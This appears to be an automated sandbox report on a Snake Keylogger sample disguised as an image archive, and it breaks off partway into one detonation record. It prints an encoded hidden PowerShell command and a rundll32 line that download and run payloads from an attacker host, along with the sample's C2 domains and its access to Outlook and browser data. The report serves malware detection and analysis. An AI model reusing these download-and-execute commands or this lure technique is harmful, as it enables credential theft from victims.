Malware Analysis Report

2025-06-16 03:51

Sample ID 240131-j4v9aagab2
Target MedExpo_Images.zip
SHA256 e17379b6d33d27a7f34ca65076488e87d70d9a9754c6c555becb8c58a23dac81
Tags
snakekeylogger collection keylogger spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e17379b6d33d27a7f34ca65076488e87d70d9a9754c6c555becb8c58a23dac81

Threat Level: Known bad

The file MedExpo_Images.zip was found to be: Known bad.

Malicious Activity Summary

snakekeylogger collection keylogger spyware stealer

Snake Keylogger payload

Snake Keylogger

Blocklisted process makes network request

Downloads MZ/PE file

Reads user/profile data of local email clients

Reads user/profile data of web browsers

Checks computer location settings

Executes dropped EXE

Accesses Microsoft Outlook profiles

Looks up external IP address via web service

Suspicious use of SetThreadContext

Enumerates physical storage devices

Uses Task Scheduler COM API

Uses Volume Shadow Copy service COM API

Modifies registry class

Kills process with taskkill

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Uses Volume Shadow Copy WMI provider

Suspicious use of AdjustPrivilegeToken

outlook_win_path

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Delays execution with timeout.exe

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

outlook_office_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-31 08:13

Signatures

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-01-31 08:13

Reported

2024-01-31 08:16

Platform

win7-20231215-en

Max time kernel

122s

Max time network

125s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Photo02.jpg.lnk

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Photo02.jpg.lnk

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" CMd /C PoWERSHEll.Exe -ex BYPASS -nOP -W HidDen -eC IAAgAGkAbgBWAE8ASwBFAC0AdwBlAEIAcgBlAHEAVQBFAHMAdAAgAAkALQBVAHIASQAgAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAtAG8AdQB0AEYAaQBsAGUAIAAJAB0gJABFAE4AVgA6AHQAZQBtAHAAXABqAHIAYgBiAHMAZgByAC4AYgBhAHQAHSAgAAkAOwAgACAAaQBOAHYATwBLAEUALQBJAHQAZQBNACAACQAdICQAZQBOAFYAOgB0AGUATQBQAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PoWERSHEll.Exe -ex BYPASS -nOP -W HidDen -eC IAAgAGkAbgBWAE8ASwBFAC0AdwBlAEIAcgBlAHEAVQBFAHMAdAAgAAkALQBVAHIASQAgAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAtAG8AdQB0AEYAaQBsAGUAIAAJAB0gJABFAE4AVgA6AHQAZQBtAHAAXABqAHIAYgBiAHMAZgByAC4AYgBhAHQAHSAgAAkAOwAgACAAaQBOAHYATwBLAEUALQBJAHQAZQBNACAACQAdICQAZQBOAFYAOgB0AGUATQBQAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g

Network

N/A

Files

memory/3012-40-0x000000001B3F0000-0x000000001B6D2000-memory.dmp

memory/3012-41-0x0000000002490000-0x0000000002498000-memory.dmp

memory/3012-42-0x000007FEF6090000-0x000007FEF6A2D000-memory.dmp

memory/3012-43-0x00000000024C0000-0x0000000002540000-memory.dmp

memory/3012-45-0x00000000024C0000-0x0000000002540000-memory.dmp

memory/3012-44-0x000007FEF6090000-0x000007FEF6A2D000-memory.dmp

memory/3012-46-0x00000000024C0000-0x0000000002540000-memory.dmp

memory/3012-47-0x00000000024C0000-0x0000000002540000-memory.dmp

memory/3012-48-0x000007FEF6090000-0x000007FEF6A2D000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-01-31 08:13

Reported

2024-01-31 08:16

Platform

win10v2004-20231215-en

Max time kernel

142s

Max time network

154s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Photo02.jpg.lnk

Signatures

Snake Keylogger

stealer keylogger snakekeylogger

Snake Keylogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4064 set thread context of 2448 N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Windows\system32\rundll32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheLimit = "1" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Extensible Cache C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheVersion = "1" C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheLimit = "1" C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheVersion = "1" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\MuiCache C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheVersion = "1" C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheLimit = "51200" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CachePrefix C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4956 wrote to memory of 4172 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 4956 wrote to memory of 4172 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 4172 wrote to memory of 448 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4172 wrote to memory of 448 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 448 wrote to memory of 4404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 448 wrote to memory of 4404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4404 wrote to memory of 4184 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DeviceCredentialDeployment.exe
PID 4404 wrote to memory of 4184 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DeviceCredentialDeployment.exe
PID 4404 wrote to memory of 2156 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4404 wrote to memory of 2156 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2156 wrote to memory of 5080 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2156 wrote to memory of 5080 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\rundll32.exe
PID 4404 wrote to memory of 1424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4404 wrote to memory of 1424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4404 wrote to memory of 3416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4404 wrote to memory of 3416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1424 wrote to memory of 5020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DeviceCredentialDeployment.exe
PID 1424 wrote to memory of 5020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DeviceCredentialDeployment.exe
PID 1424 wrote to memory of 804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1424 wrote to memory of 804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1424 wrote to memory of 2996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1424 wrote to memory of 2996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4404 wrote to memory of 4048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4404 wrote to memory of 4048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4404 wrote to memory of 820 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\conhost.exe
PID 4404 wrote to memory of 820 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\conhost.exe
PID 820 wrote to memory of 4064 N/A C:\Windows\system32\conhost.exe C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe
PID 820 wrote to memory of 4064 N/A C:\Windows\system32\conhost.exe C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe
PID 820 wrote to memory of 4064 N/A C:\Windows\system32\conhost.exe C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe
PID 4064 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4064 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4064 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4064 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Photo02.jpg.lnk

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" CMd /C PoWERSHEll.Exe -ex BYPASS -nOP -W HidDen -eC IAAgAGkAbgBWAE8ASwBFAC0AdwBlAEIAcgBlAHEAVQBFAHMAdAAgAAkALQBVAHIASQAgAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAtAG8AdQB0AEYAaQBsAGUAIAAJAB0gJABFAE4AVgA6AHQAZQBtAHAAXABqAHIAYgBiAHMAZgByAC4AYgBhAHQAHSAgAAkAOwAgACAAaQBOAHYATwBLAEUALQBJAHQAZQBNACAACQAdICQAZQBOAFYAOgB0AGUATQBQAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PoWERSHEll.Exe -ex BYPASS -nOP -W HidDen -eC IAAgAGkAbgBWAE8ASwBFAC0AdwBlAEIAcgBlAHEAVQBFAHMAdAAgAAkALQBVAHIASQAgAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAtAG8AdQB0AEYAaQBsAGUAIAAJAB0gJABFAE4AVgA6AHQAZQBtAHAAXABqAHIAYgBiAHMAZgByAC4AYgBhAHQAHSAgAAkAOwAgACAAaQBOAHYATwBLAEUALQBJAHQAZQBNACAACQAdICQAZQBOAFYAOgB0AGUATQBQAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jrbbsfr.bat" "

C:\Windows\system32\DeviceCredentialDeployment.exe

DEVIcECRedentIALdEPLOymEnt

C:\Windows\system32\rundll32.exe

RUNDll32 inEtcpL.CPl , ClearMyTracksByProcess 8

C:\Windows\system32\rundll32.exe

C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:8 WinX:0 WinY:0 IEFrame:0000000000000000

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\lxRipDbgv6WP.BAT

C:\Windows\system32\rundll32.exe

rundLl32 C:\Windows\sYStEm32\SHiMGVW.dLl , ImageView_FullscreenA http://vybsnf3.sa.com/jertrs.exe

C:\Windows\system32\DeviceCredentialDeployment.exe

dEvicEcredeNTiAldEPlOYMeNT

C:\Windows\system32\timeout.exe

timEout /T 7 /nObREAK

C:\Windows\system32\taskkill.exe

TAskkilL.Exe /F /Im rUNdlL32.exE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c DIr C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\ /s /B

C:\Windows\system32\conhost.exe

CoNhOsT C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe

C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe

C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\J6M39GIU\jertrs[1].exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 vybsnf3.sa.com udp
US 172.93.120.190:80 vybsnf3.sa.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 189.178.17.96.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 190.120.93.172.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 172.93.120.190:80 vybsnf3.sa.com tcp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 checkip.dyndns.org udp
US 158.101.44.242:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 172.67.177.134:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 242.44.101.158.in-addr.arpa udp
US 8.8.8.8:53 134.177.67.172.in-addr.arpa udp
US 8.8.8.8:53 varders.kozow.com udp
FR 51.38.247.67:8081 varders.kozow.com tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 aborters.duckdns.org udp
NL 91.92.255.235:8081 aborters.duckdns.org tcp
US 8.8.8.8:53 235.255.92.91.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 73.239.69.13.in-addr.arpa udp

Files

memory/448-0-0x00000210EB470000-0x00000210EB492000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_syecztnn.ftz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/448-10-0x00007FF8516D0000-0x00007FF852191000-memory.dmp

memory/448-11-0x00000210E8CA0000-0x00000210E8CB0000-memory.dmp

memory/448-12-0x00000210E8CA0000-0x00000210E8CB0000-memory.dmp

memory/448-13-0x00000210E8CA0000-0x00000210E8CB0000-memory.dmp

memory/448-19-0x00007FF8516D0000-0x00007FF852191000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jrbbsfr.bat

MD5 885e4bf9c36d1964f751bca33e898503
SHA1 4055100dda8ee3845cfda6735900c556d8c19ca1
SHA256 5efe4bb30df918412651e2060b234aac78f108793c2a25500aca8488ada3ab2a
SHA512 5da165cb4571777b53fbf324dabd63e73b7af94a88d0b08da8a0d28db1f6b947ad41494331be734836d2b5cb7ef090f1eed1e73b8ed9deb2fb9a37c4873691e3

C:\Users\Admin\AppData\Local\Temp\lxRipDbgv6WP.BAT

MD5 39aceb0c8a015a4e8f66498e03ff16db
SHA1 4707695dece3a70bfbe55868d059a22e4325eaf0
SHA256 7eec1caeee2e9781635bc00daf1c0dbf98ec325625776afc4fb621e2eabd4527
SHA512 0cc87584d277036c2f94f25484beeb60b07adcb1ccc90b6ddfc1e6521944c35f87cc2c9f15a2b2b453a1cd8e9c0c16ade7d6ceb4f6b082c4be6f8d1aaf8a53dc

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\J6M39GIU\jertrs[1].exe

MD5 b07832ec5f73ae5f2888ebab2aa5283a
SHA1 cb11a9e432df439fde94b6a3b3677d0112cac3c5
SHA256 dc613f5e91169b3744adfc0f6c968e3501c4bc1221ce12bdaa948ce9e5a1da21
SHA512 7a3233303f57b57e72eaabd792796339611daa39bea2279ff1879a2728afc3b6cbb25cb9b66f96f86deda3aa7fda95cab07f0a549981dddbbb4f71c25132da15

memory/4064-31-0x0000000077562000-0x0000000077563000-memory.dmp

memory/4064-33-0x0000000002330000-0x0000000002331000-memory.dmp

memory/4064-36-0x00000000007B0000-0x00000000008B0000-memory.dmp

memory/4064-41-0x00000000751B0000-0x000000007530D000-memory.dmp

memory/4064-42-0x00000000007B0000-0x00000000008B0000-memory.dmp

memory/4064-43-0x0000000000400000-0x000000000054B000-memory.dmp

memory/4064-44-0x00000000007B0000-0x00000000008B0000-memory.dmp

memory/4064-45-0x00000000007B0000-0x00000000008B0000-memory.dmp

memory/4064-46-0x00000000007B0000-0x00000000008B0000-memory.dmp

memory/4064-48-0x00000000007B0000-0x00000000008B0000-memory.dmp

memory/4064-50-0x00000000007B0000-0x00000000008B0000-memory.dmp

memory/4064-52-0x00000000007B0000-0x00000000008B0000-memory.dmp

memory/4064-54-0x00000000007B0000-0x00000000008B0000-memory.dmp

memory/4064-58-0x00000000007B0000-0x00000000008B0000-memory.dmp

memory/4064-56-0x0000000000400000-0x000000000054B000-memory.dmp

memory/4064-60-0x0000000000400000-0x000000000054B000-memory.dmp

memory/4064-63-0x00000000007B0000-0x00000000008B0000-memory.dmp

memory/4064-65-0x00000000007B0000-0x00000000008B0000-memory.dmp

memory/4064-66-0x00000000007B0000-0x00000000008B0000-memory.dmp

memory/4064-68-0x0000000000400000-0x000000000054B000-memory.dmp

memory/4064-69-0x00000000007B0000-0x00000000008B0000-memory.dmp

memory/4064-70-0x00000000007B0000-0x00000000008B0000-memory.dmp

memory/4064-72-0x00000000007B0000-0x00000000008B0000-memory.dmp

memory/4064-62-0x00000000007B0000-0x00000000008B0000-memory.dmp

memory/4064-75-0x0000000000400000-0x000000000054B000-memory.dmp

memory/4064-74-0x00000000007B0000-0x00000000008B0000-memory.dmp

memory/4064-76-0x0000000002370000-0x0000000002378000-memory.dmp

memory/4064-77-0x00000000007B0000-0x00000000008B0000-memory.dmp

memory/2448-78-0x0000000000400000-0x000000000042B000-memory.dmp

memory/4064-79-0x0000000000400000-0x000000000054B000-memory.dmp

memory/4064-81-0x00000000751B0000-0x000000007530D000-memory.dmp

memory/4064-83-0x0000000002370000-0x0000000002378000-memory.dmp

memory/2448-84-0x0000000000ED0000-0x0000000000ED1000-memory.dmp

memory/2448-82-0x0000000077562000-0x0000000077563000-memory.dmp

memory/2448-85-0x0000000000400000-0x0000000000426000-memory.dmp

memory/2448-86-0x0000000073F10000-0x00000000746C0000-memory.dmp

memory/2448-87-0x0000000005980000-0x0000000005F24000-memory.dmp

memory/2448-88-0x0000000005470000-0x000000000550C000-memory.dmp

memory/2448-89-0x00000000057C0000-0x00000000057D0000-memory.dmp

memory/2448-90-0x0000000073F10000-0x00000000746C0000-memory.dmp

memory/2448-91-0x00000000057C0000-0x00000000057D0000-memory.dmp

memory/2448-92-0x0000000006740000-0x0000000006790000-memory.dmp

memory/2448-93-0x0000000006960000-0x0000000006B22000-memory.dmp

memory/2448-94-0x0000000006830000-0x00000000068C2000-memory.dmp

memory/2448-95-0x00000000067C0000-0x00000000067CA000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-31 08:13

Reported

2024-01-31 08:16

Platform

win7-20231215-en

Max time kernel

120s

Max time network

120s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Image012.png.lnk

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

